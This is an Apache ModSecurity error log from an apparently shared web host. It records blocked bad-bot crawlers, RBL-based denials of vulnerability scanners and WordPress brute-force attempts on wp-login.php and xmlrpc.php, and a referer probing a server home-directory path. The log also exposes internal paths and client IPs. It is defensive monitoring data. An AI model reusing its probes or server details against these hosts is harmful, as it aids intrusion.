[Tue May 26 14:37:39.487309 2026] [security2:error] [pid 626747:tid 626897] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVi2xVF8Qmdmw_OMfL95gAAAR4"]
[Tue May 26 14:37:40.894648 2026] [security2:error] [pid 626747:tid 626976] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVi3BVF8Qmdmw_OMfL-FgAAAW0"]
[Tue May 26 14:37:43.106261 2026] [security2:error] [pid 626747:tid 626884] [client 34.74.242.206:1536] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.businessclubinternational.net"] [uri "/robots.txt"] [unique_id "ahVi3xVF8Qmdmw_OMfL-eQAAARE"]
[Tue May 26 14:37:43.106387 2026] [security2:error] [pid 626747:tid 626884] [client 34.74.242.206:1536] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.businessclubinternational.net"] [uri "/robots.txt"] [unique_id "ahVi3xVF8Qmdmw_OMfL-eQAAARE"]
[Tue May 26 14:37:43.235334 2026] [security2:error] [pid 626747:tid 626929] [client 34.74.242.206:1547] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.businessclubinternational.net"] [uri "/"] [unique_id "ahVi3xVF8Qmdmw_OMfL-fgAAAT4"]
[Tue May 26 14:37:43.235525 2026] [security2:error] [pid 626747:tid 626929] [client 34.74.242.206:1547] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.businessclubinternational.net"] [uri "/"] [unique_id "ahVi3xVF8Qmdmw_OMfL-fgAAAT4"]
[Tue May 26 14:37:43.432167 2026] [security2:error] [pid 626747:tid 626956] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVi3xVF8Qmdmw_OMfL-dQAAAVk"]
[Tue May 26 14:37:45.434589 2026] [security2:error] [pid 626747:tid 626918] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVi4RVF8Qmdmw_OMfL-pgAAATM"]
[Tue May 26 14:37:46.429239 2026] [security2:error] [pid 626747:tid 626860] [remote 216.73.216.240:4116] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 240.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/2023b-Nirapirigai.php"] [unique_id "ahVi4hVF8Qmdmw_OMfL-wAABNHA"]
[Tue May 26 14:37:46.700045 2026] [security2:error] [pid 626747:tid 626758] [remote 216.73.216.240:4116] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 240.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/2022c-ShanmugaRajasheaker.php"] [unique_id "ahVi4hVF8Qmdmw_OMfL-xwABgwo"]
[Tue May 26 14:37:47.636156 2026] [security2:error] [pid 626747:tid 626970] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVi4xVF8Qmdmw_OMfL-2gAAAWc"]
[Tue May 26 14:37:47.753548 2026] [security2:error] [pid 626747:tid 626914] [client 202.141.83.254:53942] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVi4xVF8Qmdmw_OMfL-7AAAAS8"]
[Tue May 26 14:37:47.753685 2026] [security2:error] [pid 626747:tid 626914] [client 202.141.83.254:53942] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVi4xVF8Qmdmw_OMfL-7AAAAS8"]
[Tue May 26 14:37:47.755433 2026] [security2:error] [pid 626747:tid 626993] [client 143.44.192.7:52275] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.192.44.143.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "m2wealthadvisor.com"] [uri "/xmlrpc.php"] [unique_id "ahVi4xVF8Qmdmw_OMfL-4wAAAX4"]
[Tue May 26 14:37:47.755590 2026] [security2:error] [pid 626747:tid 626993] [client 143.44.192.7:52275] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "m2wealthadvisor.com"] [uri "/xmlrpc.php"] [unique_id "ahVi4xVF8Qmdmw_OMfL-4wAAAX4"]
[Tue May 26 14:37:48.026197 2026] [security2:error] [pid 626747:tid 626768] [remote 95.216.117.13:41234] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "dimensioncorporativa.com.co"] [uri "/wp-login.php"] [unique_id "ahVi4xVF8Qmdmw_OMfL-9QABWBQ"]
[Tue May 26 14:37:49.163569 2026] [security2:error] [pid 626747:tid 626976] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVi5BVF8Qmdmw_OMfL_EAAAAW0"]
[Tue May 26 14:37:50.311646 2026] [security2:error] [pid 626747:tid 626782] [remote 216.73.216.240:48211] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 240.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/2013c-EzhamSuvai_TNagar.php"] [unique_id "ahVi5hVF8Qmdmw_OMfL_OQABcSI"]
[Tue May 26 14:37:50.600023 2026] [security2:error] [pid 626747:tid 626780] [remote 216.73.216.240:48211] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 240.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/2023a-DrMansoor.php"] [unique_id "ahVi5hVF8Qmdmw_OMfL_QwABFCA"]
[Tue May 26 14:37:51.128663 2026] [security2:error] [pid 626747:tid 626900] [client 154.161.32.97:57046] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.32.161.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVi5hVF8Qmdmw_OMfL_TQAAASE"]
[Tue May 26 14:37:51.128798 2026] [security2:error] [pid 626747:tid 626900] [client 154.161.32.97:57046] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVi5hVF8Qmdmw_OMfL_TQAAASE"]
[Tue May 26 14:37:51.775784 2026] [security2:error] [pid 626747:tid 626925] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVi5xVF8Qmdmw_OMfL_XQAAATo"]
[Tue May 26 14:37:53.430290 2026] [security2:error] [pid 626747:tid 626882] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVi6RVF8Qmdmw_OMfL_kgAAAQ8"]
[Tue May 26 14:37:56.031516 2026] [security2:error] [pid 626747:tid 626933] [client 114.119.152.167:22865] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/wp-content/uploads/2023/09/BARON-ALBERT-BRUT-ROSE-CHAMPAGNE.jpg"] [unique_id "ahVi7BVF8Qmdmw_OMfL_5AAAAUI"], referer: http://haddingtonwines.com/products/page/1/
[Tue May 26 14:37:56.149792 2026] [core:crit] [pid 626747:tid 626926] (13)Permission denied: [client 40.77.167.18:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:37:56.611721 2026] [security2:error] [pid 626747:tid 626996] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVi7BVF8Qmdmw_OMfL_7QAAAYE"]
[Tue May 26 14:37:58.038554 2026] [security2:error] [pid 626747:tid 626990] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVi7RVF8Qmdmw_OMfIAGwAAAXs"]
[Tue May 26 14:37:58.469411 2026] [security2:error] [pid 626747:tid 626884] [client 202.141.83.254:53764] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVi7hVF8Qmdmw_OMfIANgAAARE"]
[Tue May 26 14:37:58.469571 2026] [security2:error] [pid 626747:tid 626884] [client 202.141.83.254:53764] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVi7hVF8Qmdmw_OMfIANgAAARE"]
[Tue May 26 14:37:58.871751 2026] [security2:error] [pid 626747:tid 626978] [client 74.249.173.207:27842] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gnslocation.com.md-74.webhostbox.net"] [uri "/wk/index.php"] [unique_id "ahVi7hVF8Qmdmw_OMfIASAAAAW8"]
[Tue May 26 14:38:00.201932 2026] [security2:error] [pid 626747:tid 626998] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVi7xVF8Qmdmw_OMfIAXgAAAYM"]
[Tue May 26 14:38:01.543189 2026] [security2:error] [pid 626747:tid 626941] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVi8RVF8Qmdmw_OMfIAiAAAAUo"]
[Tue May 26 14:38:04.220417 2026] [security2:error] [pid 626747:tid 626941] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVi8xVF8Qmdmw_OMfIAxwAAAUo"]
[Tue May 26 14:38:05.681041 2026] [security2:error] [pid 626747:tid 626967] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVi9RVF8Qmdmw_OMfIA7gAAAWQ"]
[Tue May 26 14:38:07.779127 2026] [security2:error] [pid 626747:tid 626992] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVi9xVF8Qmdmw_OMfIBIQAAAX0"]
[Tue May 26 14:38:08.679607 2026] [security2:error] [pid 626747:tid 626945] [client 202.141.83.254:53771] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVi-BVF8Qmdmw_OMfIBRgAAAU4"]
[Tue May 26 14:38:08.679774 2026] [security2:error] [pid 626747:tid 626945] [client 202.141.83.254:53771] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVi-BVF8Qmdmw_OMfIBRgAAAU4"]
[Tue May 26 14:38:10.467414 2026] [security2:error] [pid 626747:tid 626933] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVi-hVF8Qmdmw_OMfIBYgAAAUI"]
[Tue May 26 14:38:10.745098 2026] [security2:error] [pid 626747:tid 626918] [client 185.191.171.19:46954] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/august-5-9/day/2024-08-21/"] [unique_id "ahVi-hVF8Qmdmw_OMfIBfQAAATM"]
[Tue May 26 14:38:10.745207 2026] [security2:error] [pid 626747:tid 626918] [client 185.191.171.19:46954] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/august-5-9/day/2024-08-21/"] [unique_id "ahVi-hVF8Qmdmw_OMfIBfQAAATM"]
[Tue May 26 14:38:12.400407 2026] [security2:error] [pid 626747:tid 626939] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVi-xVF8Qmdmw_OMfIBpgAAAUg"]
[Tue May 26 14:38:14.375910 2026] [security2:error] [pid 626747:tid 626927] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVi_RVF8Qmdmw_OMfIB3gAAATw"]
[Tue May 26 14:38:16.470341 2026] [security2:error] [pid 626747:tid 626965] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjABVF8Qmdmw_OMfICDgAAAWI"]
[Tue May 26 14:38:16.588066 2026] [security2:error] [pid 626747:tid 626772] [remote 74.7.241.58:58354] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVjABVF8Qmdmw_OMfICIgABgxg"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/bn
[Tue May 26 14:38:17.628155 2026] [security2:error] [pid 626747:tid 626773] [remote 216.73.216.240:43698] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 240.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/2025b-EzhamSuvai_Kattur.php"] [unique_id "ahVjARVF8Qmdmw_OMfICOQABdxk"]
[Tue May 26 14:38:18.268834 2026] [autoindex:error] [pid 626747:tid 626896] [client 104.28.228.77:0] AH01276: Cannot serve directory /home1/taote1zo/public_html/mosykay.com/training/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:38:18.709572 2026] [security2:error] [pid 626747:tid 626908] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjAhVF8Qmdmw_OMfICTAAAASk"]
[Tue May 26 14:38:19.343414 2026] [security2:error] [pid 626747:tid 626979] [client 202.141.83.254:53842] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVjAxVF8Qmdmw_OMfICdQAAAXA"]
[Tue May 26 14:38:19.343646 2026] [security2:error] [pid 626747:tid 626979] [client 202.141.83.254:53842] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVjAxVF8Qmdmw_OMfICdQAAAXA"]
[Tue May 26 14:38:20.884987 2026] [security2:error] [pid 626747:tid 626916] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjBBVF8Qmdmw_OMfICmQAAATE"]
[Tue May 26 14:38:21.453257 2026] [core:error] [pid 626747:tid 626996] [client 104.28.228.78:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:38:21.453273 2026] [core:error] [pid 626747:tid 626996] [client 104.28.228.78:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:38:21.711177 2026] [security2:error] [pid 626747:tid 626900] [client 217.60.241.103:52480] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.241.60.217.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahVjBRVF8Qmdmw_OMfICwAAAASE"], referer: https://www.facebook.com/
[Tue May 26 14:38:22.036314 2026] [security2:error] [pid 626747:tid 627001] [client 217.60.241.103:52675] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.241.60.217.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahVjBhVF8Qmdmw_OMfIC1AAAAYY"]
[Tue May 26 14:38:22.847755 2026] [security2:error] [pid 626747:tid 626999] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjBhVF8Qmdmw_OMfIC5QAAAYQ"]
[Tue May 26 14:38:22.978146 2026] [security2:error] [pid 626747:tid 626998] [client 217.60.241.103:52787] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.241.60.217.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahVjBhVF8Qmdmw_OMfIC9QAAAYM"], referer: https://www.google.com/search?q=wordpress
[Tue May 26 14:38:23.712315 2026] [security2:error] [pid 626747:tid 626919] [client 167.71.246.78:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.obinnawrites.com.thedebateafrica.org"] [uri "/index.php"] [unique_id "ahVjBhVF8Qmdmw_OMfIC3AAAATQ"]
[Tue May 26 14:38:23.812987 2026] [security2:error] [pid 626747:tid 626945] [client 168.119.96.239:13148] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahVjBxVF8Qmdmw_OMfIDEQAAAU4"], referer: https://thegoodsporting.com
[Tue May 26 14:38:24.863132 2026] [security2:error] [pid 626747:tid 626894] [client 154.161.32.97:57047] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.32.161.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVjCBVF8Qmdmw_OMfIDKgAAARs"]
[Tue May 26 14:38:24.863339 2026] [security2:error] [pid 626747:tid 626894] [client 154.161.32.97:57047] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVjCBVF8Qmdmw_OMfIDKgAAARs"]
[Tue May 26 14:38:24.967241 2026] [security2:error] [pid 626747:tid 626991] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjCBVF8Qmdmw_OMfIDJgAAAXw"]
[Tue May 26 14:38:26.197662 2026] [core:error] [pid 626747:tid 626887] [client 104.28.228.78:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:38:26.197687 2026] [core:error] [pid 626747:tid 626887] [client 104.28.228.78:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:38:26.559104 2026] [security2:error] [pid 626747:tid 626981] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjChVF8Qmdmw_OMfIDTAAAAXI"]
